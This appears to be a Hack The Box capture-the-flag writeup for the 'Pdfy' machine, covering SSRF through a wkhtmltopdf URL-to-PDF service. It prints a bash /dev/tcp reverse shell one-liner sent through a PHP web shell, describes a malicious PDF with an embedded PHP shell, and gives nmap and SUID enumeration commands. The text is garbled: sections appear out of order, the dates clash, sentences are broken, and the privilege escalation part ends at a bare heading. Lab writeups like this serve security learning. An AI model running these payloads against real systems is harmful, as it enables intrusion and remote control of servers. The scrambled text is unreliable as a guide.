Pdfy Htb Writeup Upd Jun 2026

Mastering the Pdfy Hack The Box Machine: A Detailed Writeup (Upd. 2026)

I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.

fetch("/api/cache", { method: "POST", body: JSON.stringify({ url: url.value }), headers: { "Content-Type": "application/json" } })

We need to set up our own attacker server. Here, we'll use a simple HTTP server (like Python's http.server) and expose it to the internet using ngrok to bypass potential firewall issues.


The challenge presents a web application designed to take a user-supplied URL and convert that web page into a downloadable PDF document. By understanding how the backend PDF rendering engine processes redirects, you can bypass local restrictions to read sensitive system files and capture the flag.

The scan reveals the following open ports:

We start with an Nmap scan to identify open ports and services.

nmap -sC -sV -oA nmap/pdfy 10.10.10.x

Port 22/tcp (SSH): Likely for final access.
Port 80/tcp (HTTP): The primary web application.

Web Application Analysis (Port 80)

Read local files (like /etc/passwd) using the server's internal access.

Step-by-Step Walkthrough

Reconnaissance & Identification

The web interface accepts a URL to convert to PDF. The backend often uses wkhtmltopdf to render the content.

To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control.

: Server-Side Request Forgery (SSRF) triggered via PDF generation.

1. Initial Reconnaissance

This method uses a simple HTML page hosted on your own machine to redirect wkhtmltopdf to the target local file.

This writeup covers the challenge from Hack The Box, updated as of April 2026. This challenge focuses on exploiting Server-Side Request Forgery (SSRF) via a PDF generation service that uses a vulnerable version of wkhtmltopdf.

Challenge Overview


Trigger a reverse shell:

http://10.10.10.x/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1'

We are now on the box as the www-data user.

5. Privilege Escalation: Root Access

With low-level access, we need to escalate to root.

Enumerating Local Privileges

We check for SUID binaries, sudo rights, or cron jobs.

sudo -l
find / -perm -u=s -type f 2>/dev/null

Exploit: System Service/Cron Job